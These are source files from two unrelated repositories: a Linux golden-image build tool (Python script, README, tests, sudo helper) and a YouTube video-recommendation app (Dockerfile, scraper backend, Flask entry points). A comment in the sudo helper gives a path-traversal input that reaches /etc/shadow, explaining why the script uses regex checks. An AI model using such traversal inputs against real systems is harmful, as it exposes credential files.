\"\"\n ]\n command += [image_file, checksum_file, upload_target]\n call_command(command)\n logger.info(\"Successfully uploaded \" + image_file + \" to \" + upload_target)\n\n if config.has_option(destination, \"post-upload-command\"):\n config.set(destination, \"image\", image_file)\n command = [\n a\n for a in config.get(destination, \"post-upload-command\").split(\" \")\n if a.strip() != \"\"\n ]\n call_command(command)\n\n i = 1\n while config.has_option(destination, \"post-upload-command\" + str(i)):\n config.set(destination, \"image\", image_file)\n command = config.get(destination, \"post-upload-command\" + str(i))\n command = [a for a in command.split(\" \") if a.strip() != \"\"]\n call_command(command)\n i += 1\n else:\n logger.error(\"Unknown upload type '%s' specified. Supported types: rsync\", upload_type)\n sys.exit(1)\n\n\ndef parse_args(argv):\n \"\"\"Parse the command line arguments.\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"image\",\n nargs=\"?\",\n default=os.environ.get(\"IMAGE\"),\n help=\"Image to build (date and suffix will be added).\",\n )\n parser.add_argument(\n \"-c\", \"--cache-dir\", help=f\"Cache directory (default: {get_default_cache_dir()})\"\n )\n parser.add_argument(\n \"-f\", \"--format\", choices=[\"qcow2\", \"raw\"], help=\"Image format to use (default: raw)\"\n )\n parser.add_argument(\"--image-size\", help=\"Size of the raw image (default: 2G)\")\n parser.add_argument(\"--mac\", help=\"MAC address used in the installation machine\")\n parser.add_argument(\n \"--installer-logs\",\n dest=\"installer_logs\",\n action=\"store_true\",\n default=None,\n help=\"Print installer logs into logging output\",\n )\n parser.add_argument(\n \"--no-installer-logs\",\n dest=\"installer_logs\",\n action=\"store_false\",\n default=None,\n help=\"Do not print installer logs into logging output\",\n )\n parser.add_argument(\n \"--log-file\",\n dest=\"log_file\",\n action=\"store_true\",\n default=None,\n help=\"Store logs into a file (in addition to stdout/stderr)\",\n )\n parser.add_argument(\n \"--no-log-file\",\n dest=\"log_file\",\n action=\"store_false\",\n default=None,\n help=\"Do not store logs into a file (in addition to stdout/stderr)\",\n )\n parser.add_argument(\"--log-filename\", help=\"log into specified file\")\n args = parser.parse_args(argv)\n\n if not args.image:\n parser.error(\"No image specified.\")\n\n return args\n\n\ndef override_configs_by_args(config, args):\n \"\"\"Override the configs from the configuration by arguments from the command line.\n\n The command line argument take precedence over the configs from the config file.\n \"\"\"\n if args.image not in config:\n config[args.image] = {}\n image_conf = config[args.image]\n\n if args.cache_dir is not None:\n image_conf[\"cache_dir\"] = args.cache_dir\n if args.mac is not None:\n image_conf[\"mac\"] = args.mac\n if args.format is not None:\n image_conf[\"format\"] = args.format\n if args.image_size is not None:\n image_conf[\"image-size\"] = args.image_size\n if args.installer_logs is not None:\n image_conf[\"installer-logs\"] = str(args.installer_logs)\n if args.log_file is not None:\n image_conf[\"log-file\"] = str(args.log_file)\n if args.log_filename is not None:\n image_conf[\"log-filename\"] = args.log_filename\n\n if \"cache_dir\" not in image_conf:\n image_conf[\"cache_dir\"] = get_default_cache_dir()\n\n return config\n\n\ndef main():\n args = parse_args(sys.argv[1:])\n config = get_config()\n missing_image_section = args.image not in config\n override_configs_by_args(config, args)\n image_conf = config[args.image]\n image_conf[\"cache_dir\"] = os.path.expanduser(image_conf[\"cache_dir\"])\n\n logger = logging.getLogger(__logger_name__)\n logging.basicConfig(format=DEFAULT_LOGGING_FORMAT, level=logging.INFO)\n if image_conf.getboolean(\"log-file\", fallback=False):\n if \"log-filename\" in image_conf:\n log_filename = image_conf[\"log-filename\"]\n else:\n log_filename = args.image + \"-\" + datetime.date.today().isoformat() + \".log\"\n file_handler = logging.FileHandler(log_filename, mode=\"w\")\n file_handler.setFormatter(logging.Formatter(DEFAULT_LOGGING_FORMAT))\n logger.addHandler(file_handler)\n\n # Check that configuration for installer_image or (initrd and linux) exists\n if \"installer_image\" not in image_conf:\n required_options = [\"initrd\", \"linux\"]\n missing_options = [option for option in required_options if option not in image_conf]\n if missing_options:\n if missing_image_section:\n logger.error(\"No section '%s' defined in image-factory.conf.\", args.image)\n else:\n for option in missing_options:\n logger.error(\n \"No option '%s' or 'installer_image' defined in section '%s' \"\n \"in image-factory.conf.\",\n option,\n args.image,\n )\n sys.exit(1)\n\n image = args.image + \"-\" + datetime.date.today().isoformat() + \".raw\"\n create_raw_image(image, image_conf.get(\"image-size\", DEFAULT_IMAGE_SIZE))\n run_installation(config, args.image, image)\n post_installation(\n os.path.basename(sys.argv[0]),\n image,\n image_conf.getboolean(\"installer-logs\", fallback=False),\n )\n if image_conf[\"format\"] == \"qcow2\":\n image = create_qcow2(image, image_conf.getboolean(\"keep-raw\", fallback=False))\n else:\n create_hashsum(image)\n logger.info(\"Successfully created %s\", image)\n upload_image(config, args.image, image, image + \".sha256sum\")\n if config.has_option(args.image, \"post-build-command\"):\n cmd = [config.get(args.image, \"post-build-command\"), image]\n call_command(cmd)\n\n\nif __name__ == \"__main__\":\n try:\n main()\n except KeyboardInterrupt:\n print(\"User abort.\")\n" }, { "alpha_fraction": 0.7509717345237732, "alphanum_fraction": 0.753044843673706, "avg_line_length": 29.626983642578125, "blob_id": "44e4cc0662014ff9faf2d608ef98a4f30d9b40dd", "content_id": "ab81b41c94ddf8eed4d2ba588953d9be81fbb65a", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3859, "license_type": "permissive", "max_line_length": 79, "num_lines": 126, "path": "/README.md", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "image-factory\n=============\n\nimage-factory is a command line tool for building golden Linux images. It uses\nvirt-install to do installations via the network. The installation and\nconfiguration of the images is done using the netinstall support from the\ndistributions, i.e.\n\n* preseed for Debian/Ubuntu\n* Kickstart for CentOS/Fedora\n* AutoYaST for openSUSE\n\nimage-factory is used by IONOS Cloud to build the golden public Linux images\nfor their Enterprise Cloud. The configuration files are shipped with this\nproject to allow anyone to rebuild their images.\n\nimage-factory runs following steps:\n\n* Create a virtual RAW image using `qemu-img`.\n\n* Cache `linux` kernel and `initrd`.\n\n* Run installation using `virt-install`. `qemu:///session` is used as session\nfor normal users and `qemu:///system` when run as root.\n\n* The installation partition is mounted and the installer logs are removed.\n\n* `zerofree` is run on the partition.\n\n* If `format` is set to `qcow2`, the virtual raw images will be converted\nto `qcow2` using `qemu-img`.\n\n* The SHA 256 sum is calculated for the image.\n\n* The image will be uploaded to all locations configured in\n`upload_destinations`.\n\n* If `post-build-command` is configured, the specified command will be\nexecuted.\n\nDependencies\n============\n\nThese components are needed to run `image-factory`:\n\n* Python 3\n* Python modules:\n * httplib2\n * parted\n* qemu-utils for `qemu-img`\n* virtinst for `virt-install`\n* zerofree\n\npandoc is needed to generate the man page.\n\nThe test cases have additional requirements:\n\n* black\n* flake8\n* isort\n* pylint\n\nPermissions\n===========\n\n`image-factory` can be run as normal user, but it need root permission for a\nfew operations like chmod, mount, and umount. Since these operations cannot be\nsecured with sudo's wildcards, `image-factory-sudo-helper` was introduced to\ncheck the commands using regular expression.\n\nTo allow running `image-factory` as normal user, only\n`image-factory-sudo-helper` needs sudo permission for the user. Example sudo\nconfiguration for user `jenkins`:\n\n```\njenkins ALL = NOPASSWD:SETENV: /usr/bin/image-factory-sudo-helper\n```\n\nOn Debian and Ubuntu, the user has to be in the group `disk` to get the\npermission for mounting loop devices.\n\nAlternatives\n============\n\nHashiCorp Packer\n----------------\n\n[HashiCorp Packer](https://www.packer.io/) automates the creation of any type\nof machine image (including non *nix). The\n[QEMU Builder](https://www.packer.io/docs/builders/qemu) can provide a similar\nfunctionality to `image-factory`.\n\nWhile HashiCorp Packer takes an URL pointing to an installer ISO,\n`image-install` uses the smaller netinstall kernel and initrd files instead.\n\nHashiCorp Packer provides post-processors that can enable the remaining\nfunctionality of `image-factory`, namely\n[checksum](https://www.packer.io/docs/post-processors/checksum) and\n[local shell](https://www.packer.io/docs/post-processors/shell-local) to upload\nthe images via rsync, however there is currently no dedicated post-processor\nfor it. `image-factory` supports rsync uploads via configuration option.\n\nContributing\n============\n\nContributions are welcome. The source code has test coverage, which should be\npreserved or increased. So please provide a test case for each bugfix and one\nor more test cases for each new feature. Please follow\n[How to Write a Git Commit Message](https://chris.beams.io/posts/git-commit/)\nfor writing good commit messages.\n\nCreating releases\n=================\n\nTo create a release, increase the version in `Makefile`, document the\nnoteworthy changes in [NEWS.md](./NEWS.md), and commit and tag the release:\n\n```sh\ngit commit -s -m \"Release image-factory $(make version)\" Makefile NEWS.md\ngit tag \"$(make version)\" -m \"Release image-factory $(make version)\"\n```\n\nThe xz-compressed release tarball can be generated by running:\n```sh\nmake dist\n```\n" }, { "alpha_fraction": 0.6301490068435669, "alphanum_fraction": 0.6393514275550842, "avg_line_length": 39.75, "blob_id": "0be8cbf6330cbe6f19a4a55f72ad6fab2cddd580", "content_id": "dbf7bd3935074ed2a876e253426fccd5b2748849", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2282, "license_type": "permissive", "max_line_length": 91, "num_lines": 56, "path": "/tests/test_flake8.py", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "# Copyright (C) 2017-2018, Benjamin Drung <[email protected]>\n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\n# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\n# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\n# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\n# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\n# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\n\"\"\"Run flake8 check.\"\"\"\n\nimport subprocess\nimport sys\nimport unittest\n\nfrom . import get_source_files, unittest_verbosity\n\n\nclass Flake8TestCase(unittest.TestCase):\n \"\"\"\n This unittest class provides a test that runs the flake8 code\n checker (which combines pycodestyle and pyflakes) on the Python\n source code. The list of source files is provided by the\n get_source_files() function.\n \"\"\"\n\n def test_flake8(self):\n \"\"\"Test: Run flake8 on Python source code.\"\"\"\n cmd = [sys.executable, \"-m\", \"flake8\", \"--max-line-length=99\"] + get_source_files()\n if unittest_verbosity() >= 2:\n sys.stderr.write(f\"Running following command:\\n{' '.join(cmd)}\\n\")\n with subprocess.Popen(\n cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True\n ) as process:\n out, err = process.communicate()\n\n if process.returncode != 0: # pragma: no cover\n msgs = []\n if err:\n msgs.append(\n f\"flake8 exited with code {process.returncode} \"\n f\"and has unexpected output on stderr:\\n{err.decode().rstrip()}\"\n )\n if out:\n msgs.append(f\"flake8 found issues:\\n{out.decode().rstrip()}\")\n if not msgs:\n msgs.append(\n f\"flake8 exited with code {process.returncode} \"\n \"and has no output on stdout or stderr.\"\n )\n self.fail(\"\\n\".join(msgs))\n" }, { "alpha_fraction": 0.5848850011825562, "alphanum_fraction": 0.6495071053504944, "avg_line_length": 34.11538314819336, "blob_id": "acb2fe6a03a59ac7247b1f6e6c743baa1e5eac4e", "content_id": "e475cd31424b8c4ba50cad4dcf2e8a914dd19d94", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 913, "license_type": "permissive", "max_line_length": 75, "num_lines": 26, "path": "/NEWS.md", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "image-factory 1.0.2 (2021-11-12)\n================================\n\n* Fix issues found by pylint 2.11.1\n (fixes [Debian bug #998571](https://bugs.debian.org/998571)):\n * tests: Use `with` for `subprocess.Popen` and `open` calls\n * Open log files explicitly as UTF-8\n * Replace `.format()` with f-strings\n* Drop Python 2 support\n* Update my email address to @ionos.com\n* tests: Add black code formatting check\n* tests: Check import definitions order with isort\n* tests: Fix running tests as root\n* tests: Disable bad-continuation for pylint (for Ubuntu 20.04)\n* Use ftp.rz.uni-frankfurt.de as example CentOS mirror (old mirror is gone)\n\nimage-factory 1.0.1 (2021-01-29)\n================================\n\n* Update example CentOS 7 mirror URL (old URL does not work any more)\n* Increase CentOS 7 image size from 2 GiB to 3 GiB\n\nimage-factory 1.0.0 (2020-08-11)\n================================\n\n* Initial release\n" }, { "alpha_fraction": 0.670292317867279, "alphanum_fraction": 0.6811692714691162, "avg_line_length": 33.20930099487305, "blob_id": "19550e33cab79f26004002655576037257f3b7ef", "content_id": "76602733264fd10ba145cc91ecc45f635ee07f59", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1471, "license_type": "permissive", "max_line_length": 85, "num_lines": 43, "path": "/image-factory-sudo-helper", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "#!/bin/bash\nset -eu\n\n# Copyright (C) 2019, IONOS SE\n# Author: Benjamin Drung <[email protected]>\n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\n# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\n# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\n# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\n# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\n# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\n# This sudo helper exists, because sudo does not support regular expressions\n# and the supported wildcards cannot be secured. Example:\n# `/tmp/image-factory/../../etc/shadow` matches `/tmp/image-factory*`\n\nMOUNTDIR=/tmp/image-factory\npassed=\n\nif [[ \"$*\" =~ ^chmod( -R)?\\ o[+-]r?w?x?\\ ${MOUNTDIR}\\.(\\.?[A-Za-z0-9_/-]+)*$ ]]; then\n\tpassed=yes\nelif [[ \"$*\" =~ ^mount\\ /dev/loop[0-9]*\\ ${MOUNTDIR}\\.[A-Za-z0-9_/-]*$ ]]; then\n\tpassed=yes\nelif [[ \"$*\" =~ ^umount\\ ${MOUNTDIR}\\.[A-Za-z0-9_/-]*$ ]]; then\n\tpassed=yes\nfi\n\nif test -z \"$passed\"; then\n\techo \"${0##*/}: Command '$*' not allowed.\" >&2\n\texit 1\nfi\n\nif test -n \"${DRYRUN:-}\"; then\n\techo \"${0##*/}: $*\"\nelse\n\texec \"$@\"\nfi\n" }, { "alpha_fraction": 0.5964125394821167, "alphanum_fraction": 0.6046912670135498, "avg_line_length": 38.17567443847656, "blob_id": "51bb1db5274354be8fad765b1460b52e16819b75", "content_id": "eb8ccabbf0061667f77fa132e80b91376dd2b12a", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2899, "license_type": "permissive", "max_line_length": 95, "num_lines": 74, "path": "/tests/test_pylint.py", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "# Copyright (C) 2010, Stefano Rivera <[email protected]>\n# Copyright (C) 2017-2018, Benjamin Drung <[email protected]>\n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH\n# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY\n# AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,\n# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM\n# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR\n# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR\n# PERFORMANCE OF THIS SOFTWARE.\n\n\"\"\"Run pylint.\"\"\"\n\nimport os\nimport re\nimport subprocess\nimport sys\nimport unittest\n\nfrom . import get_source_files, unittest_verbosity\n\nCONFIG = os.path.join(os.path.dirname(__file__), \"pylint.conf\")\n\n\nclass PylintTestCase(unittest.TestCase):\n \"\"\"\n This unittest class provides a test that runs the pylint code check\n on the Python source code. The list of source files is provided by\n the get_source_files() function and pylint is purely configured via\n a config file.\n \"\"\"\n\n def test_pylint(self):\n \"\"\"Test: Run pylint on Python source code.\"\"\"\n\n cmd = [sys.executable, \"-m\", \"pylint\", \"--rcfile=\" + CONFIG, \"--\"] + get_source_files()\n if unittest_verbosity() >= 2:\n sys.stderr.write(f\"Running following command:\\n{' '.join(cmd)}\\n\")\n with subprocess.Popen(\n cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True\n ) as process:\n out, err = process.communicate()\n\n if process.returncode != 0: # pragma: no cover\n # Strip trailing summary (introduced in pylint 1.7). This summary might look like:\n #\n # ------------------------------------\n # Your code has been rated at 10.00/10\n #\n out = re.sub(\n \"^(-+|Your code has been rated at .*)$\", \"\", out.decode(), flags=re.MULTILINE\n ).rstrip()\n\n # Strip logging of used config file (introduced in pylint 1.8)\n err = re.sub(\"^Using config file .*\\n\", \"\", err.decode()).rstrip()\n\n msgs = []\n if err:\n msgs.append(\n f\"pylint exited with code {process.returncode} \"\n f\"and has unexpected output on stderr:\\n{err}\"\n )\n if out:\n msgs.append(f\"pylint found issues:\\n{out}\")\n if not msgs:\n msgs.append(\n f\"pylint exited with code {process.returncode} \"\n \"and has no output on stdout or stderr.\"\n )\n self.fail(\"\\n\".join(msgs))\n" }, { "alpha_fraction": 0.6644605994224548, "alphanum_fraction": 0.6982131004333496, "avg_line_length": 34.97618865966797, "blob_id": "76fddcbe6baa9640eb4270a7118a71c06d1b20b8", "content_id": "3ae8709010e81b3e451290e6258e54f7e42011d7", "detected_licenses": [ "ISC" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1511, "license_type": "permissive", "max_line_length": 74, "num_lines": 42, "path": "/tests/test_helper.py", "repo_name": "ionos-enterprise/image-factory", "src_encoding": "UTF-8", "text": "# Copyright (C) 2019, Benjamin Drung <[email protected]>\n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\n# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\n# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\n# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\n# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\n# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\n\"\"\"Test helper functions from image-factory.\"\"\"\n\nimport unittest\n\nfrom image_factory import parse_bytes\n\n\nclass TestParseBytes(unittest.TestCase):\n \"\"\"\n This unittest class tests parse_bytes().\n \"\"\"\n\n def test_parse_1_g(self):\n \"\"\"Test parse_bytes(\"1G\")\"\"\"\n self.assertEqual(parse_bytes(\"1G\"), 1073741824)\n\n def test_parse_2_tb(self):\n \"\"\"Test parse_bytes(\"2 TB\")\"\"\"\n self.assertEqual(parse_bytes(\"2 TB\"), 2000000000000)\n\n def test_parse_512_mib(self):\n \"\"\"Test parse_bytes(\"512 MiB\")\"\"\"\n self.assertEqual(parse_bytes(\"512 MiB\"), 536870912)\n\n def test_invalid(self):\n \"\"\"Test parse_bytes(\"invalid\")\"\"\"\n with self.assertRaises(ValueError):\n parse_bytes(\"invalid\")\n" } ]
15
Jarbas-Jr/projetct-youtube-recommendation
https://github.com/Jarbas-Jr/projetct-youtube-recommendation
a875ad5cfc0c8650ca927d8370acfc12fc178b07
a32d8aee71db39e2559bfebb980f4f5659caa013
16b3758ccbaa37c3dc3265d0a77da32e6d43ad9b
refs/heads/master
2022-11-04T17:20:23.031115
2020-06-22T02:23:10
2020-06-22T02:23:10
265,133,672
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7655772566795349, "alphanum_fraction": 0.7742769718170166, "avg_line_length": 91.47826385498047, "blob_id": "8dfb592a7a7648887873d3d4a2ed22c1fc75f46b", "content_id": "c75acc3fe3dd951bfb361927d7072647143deaf5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 4307, "license_type": "no_license", "max_line_length": 783, "num_lines": 46, "path": "/4. Colocando em produção/Dockerfile", "repo_name": "Jarbas-Jr/projetct-youtube-recommendation", "src_encoding": "UTF-8", "text": "# Esse dockerfile vai ser o arquivo de configurações, as instruções que vamos dar para o contêiner.\n# Esse FROM, é um ambiente pré-configurado.\n# COPY esta simplesmente copiando os arquivos que temos pra uma pasta app, e ai ele vai tratar essa pasta app como a pasta onde ele deve rodar os comandos, entao os arquivos python vao parar dentro dessa pasta app, dentro do contêiner, dentro desse ambiente pré-configurado com todas as bibliotecas que precisamos. \n\n# Agora o grande problema vai do WORKDIR pra baixo, pq podemos rodar alguns comandos que vai instala algumas bibliotecas que precisamos. Então roda um 'apt-get update' pra ele atualizar os pacotes no linux. E vai instalar alguns pacotes que a gente precisa pra rodar o lighBGM, se nao vai dar erro, e isso mario achou olhando o docker do proprio LGBM, olhou no repositório do próprio LGBM e copiou os comandos necessarios de lá(https://github.com/microsoft/LightGBM/blob/master/docker/dockerfile-python).\n\n# Depois vamos rodar 'pip install -r requirements.txt', pip é o gerenciador de pacotes do python. E quando passamos '-r' e um arquivo 'requitements' ele vai tentar instalar a lista de bibliotecas nesse arquivo(ABRIR O ARQUIVO AQUI NA PASTA) com suas respectivas versões. Deve-se colocar a versão pq ele pode instalar a versão mais nova e ai ele pode quebrar algum código nosso. Mas como encontramos a versão da biblioteca que estamos usando pra treinar o modelo e etc ? Devemos abrir o terminal e colocar (pip freeze | grep 'nome da bib') e ele nos da a versão, dai é só copiar e jogar no requirements.txt.\n\n# Em 'CMD python ./app.py' que está comentado, esse é comando que se quisermos rodar com o servidor do flask, podemos rodar esse arquivo, mas nao e recomendavel usar em produção. Entao aqui ja colocamos direto com um servidor mais robusto com um servidor recomendado com o próprio heroku. Mario descobriu esses comandos indo no github do heroku e na documentação e eles trazem esse exemplo, e mario abriu o dockerfile do exemplo que eles tem, o exemplo minimo de um contêiner docker que pode ser feito o deploy no heroku(https://github.com/heroku/alpinehelloworld/blob/master/Dockerfile). Mario foi ver quais o comandos, e eles estão usando 'G unicorn', servidor robusto pra se usar em produção. \n\n# LEMBRANDO: quando estivermos lidando com coisas em produção, bom perguntar pra quem entenda melhor parte de servidor, infraestrutura, devops, engenharia, pra ter certeza que estamos fazer do jeito seguro, que nao nos traga problemas depois e o foco aqui é na modelagem e não da engenharia. Então estamos fazendo uma solução basica pra colocar em produção e em boa parte do tempo nao vamos fazer uma aplicação que será exposta diretamente a um usuario na internet, pelo menos nao dessa maneira que tu ja entra e ja roda o flask ali. Geralmente vamos fazer API's internas que uma outra aplicação vai acabar fazendo a requisição, entao acaba sendo mais seguro. Mas definitivamente isso aqui acaba sendo mais de Engenharia de Machine Learning do que da ciencia de dados e da modelagem.\n\n# Segundo a documentação do heroku, precisamos passar aqui 'CMD gunicorn --bind 0.0.0.0:$PORT wsgi'. e o cifrão PORT e pra colocar a porta que ele vai rodar.\n\n# Se quisermos rodar localmente, descomentamos o comando '#CMD gunicorn --bind 0.0.0.0:80 wsgi ', e ai rodamos essa imagem do docker em um ambiente local(localhoost no linux). \n\nFROM python:3.7-slim\nCOPY . /app\nWORKDIR /app\nRUN apt-get update && \\\n apt-get install -y --no-install-recommends \\\n ca-certificates \\\n cmake \\\n build-essential \\\n gcc \\\n g++ \nRUN pip install -r requirements.txt\nRUN python db_starter.py\n#CMD python ./app.py\n\n# Run the image as a non-root user\n#RUN adduser -D myuser\n#USER myuser\n\n# Run the app. CMD is required to run on Heroku\n# $PORT is set by Heroku\t\t\t\nCMD gunicorn --bind 0.0.0.0:$PORT wsgi \n#CMD gunicorn --bind 0.0.0.0:80 wsgi \n\n\n#https://github.com/microsoft/LightGBM/blob/master/docker/dockerfile-python\n#https://github.com/heroku/alpinehelloworld\n#https://devcenter.heroku.com/articles/container-registry-and-runtime\n\n#Creating app... done, ⬢ sheltered-reef-65520\n#https://sheltered-reef-65520.herokuapp.com/ | https://git.heroku.com/sheltered-reef-65520.git" }, { "alpha_fraction": 0.7835497856140137, "alphanum_fraction": 0.7835497856140137, "avg_line_length": 76.33333587646484, "blob_id": "e9d99780a7cd75040895cd645fb86207aba1d811", "content_id": "c9717f48da58be6bde9c8ba8a2157db0c9b9bf35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 236, "license_type": "no_license", "max_line_length": 195, "num_lines": 3, "path": "/4. Colocando em produção/wsgi.py", "repo_name": "Jarbas-Jr/projetct-youtube-recommendation", "src_encoding": "UTF-8", "text": "from app import app as application\n\n# esse serve pra gente poder usar um servidor chamado 'G unicorn', que vai ser o servidor que vai atender as requisições que forem feitas pro nosso app. Então isso é tudo, é a parte mais simples." }, { "alpha_fraction": 0.635898768901825, "alphanum_fraction": 0.6366658210754395, "avg_line_length": 80.5, "blob_id": "858b4ddf428663579a4959237bf09c2d89cf67e7", "content_id": "7162478af87e44d02a62cf605721848779040bd7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3948, "license_type": "no_license", "max_line_length": 318, "num_lines": 48, "path": "/4. Colocando em produção/run_backend.py", "repo_name": "Jarbas-Jr/projetct-youtube-recommendation", "src_encoding": "UTF-8", "text": "from get_data import *\nfrom ml_utils import *\nimport time\n\nqueries = [\"machine+learning\", \"data+science\", \"kaggle\"]\n\n# A gente ta puxando essa função la pro arquivo python do app.\n# Abre o arquivo novos videos, vai iterar pelas queries, que nem nos notebooks de coleta e processamento la no começo, entao e importante guardar para adapta-lo pra buscar as mesmas informações me produção.\n\ndef update_db():\n with open(\"novos_videos.json\", 'w+') as output:\n for query in queries: \n # aqui colocamos pra pegar até a pagina 3.\n for page in range(1,4):\n print(query, page)\n # a gente vai baixar a pagina de busca passando qual é a query e qual é a pagina. Retorna o codigo fonte e armazena esse search_page\n search_page = download_search_page(query, page)\n # mesma coisa pra pegar os links dos videos, so que ao invés de salvar em um dataframe que nem antes, a gente salva nesa video_list.\n video_list = parse_search_page(search_page)\n \n # e ai a gente vai iterar por cada video nessa video_list\n for video in video_list:\n # baixar as informações da pagina do video, passando pra essa função o link do video, passando o link ela vai acessar essa pagina e buscar as informações, vai guardar na video_page, equivalente a aquela função que usavamos para salvar HTMLS, a pagina de cada video\n video_page = download_video_page(video['link'])\n # vamos fazer o processamento dessa pagina de video, e vamos retornar algumas informações como o json.\n video_json_data = parse_video_page(video_page)\n \n # mario descobriu que alguns videos o endereço deles nao funcional, nao se acha as informações. Entao colocamos que se o 'watch-time-text' nao tiver no video_json_data, pula para o proximo video. Proteção pra nao travar.\n if 'watch-time-text' not in video_json_data:\n continue\n # esse video_json_data, atraves da função compute_prediction, essa função vai pegar esses dados, criar as features, vai rodar o modelo e retornar pra gente a probabilidade de ser um video bom ou ruim. não probabilidade no sentido rigoroso mas um score de relevância pra gente rankear esses videos. \n p = compute_prediction(video_json_data)\n\n # Essa basicamente é a parte que a gente fez com ML, daqui pra frente e so processamento desses dados pra jogar la pro fronted, a pagina onde tem a lista de videos.\n \n # aqui vou pegar uma 'tag', e vamos pegar o video_id que é o link do video.\n video_id = video_json_data.get('og:video:url', '')\n # e nesse data_front a gente passa as informações que a gente vai ter naquela lista de videos que criamos em app.py, quando rodamos o update.db, e das linhas criadas aqui individualmente. Com titulo, score e id do video.\n data_front = {\"title\": video_json_data['watch-title'], \"score\": float(p), \"video_id\": video_id}\n # momento em que a gente ta fazendo o processamento desse video no formato de nano segundos.\n data_front['update_time'] = time.time_ns()\n \n # aqui e um print so pra questao de debuguing, so pra ver se ele ta processando tudo bem, mas a gente poderia comentar essa linha que nao faria muita diferença \n print(video_id, json.dumps(data_front))\n \n # depois ele joga tudo pro arquivo json, novos_videos.json, ele coloca um json por linha e esse vai ser nosso banco de dados dos ultimos videos que avaliamos. \n output.write(\"{}\\n\".format(json.dumps(data_front)))\n return True" }, { "alpha_fraction": 0.7266504168510437, "alphanum_fraction": 0.7331913709640503, "avg_line_length": 74.57471466064453, "blob_id": "f7c46ebc9a567b39efc3421cede5c13adc54c6f8", "content_id": "770b41a801d096252eebf2a326cc3dfceb298127", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6660, "license_type": "no_license", "max_line_length": 661, "num_lines": 87, "path": "/4. Colocando em produção/app.py", "repo_name": "Jarbas-Jr/projetct-youtube-recommendation", "src_encoding": "UTF-8", "text": "# deploy_front/app.py\n\n\nimport os.path\nfrom flask import Flask\nimport os\nimport json\nimport run_backend\n\nimport time\n\n# criando esse app, pra criar o objeto flask pra que ele sirva as paginas pro servidor entender os comandos que ele vai 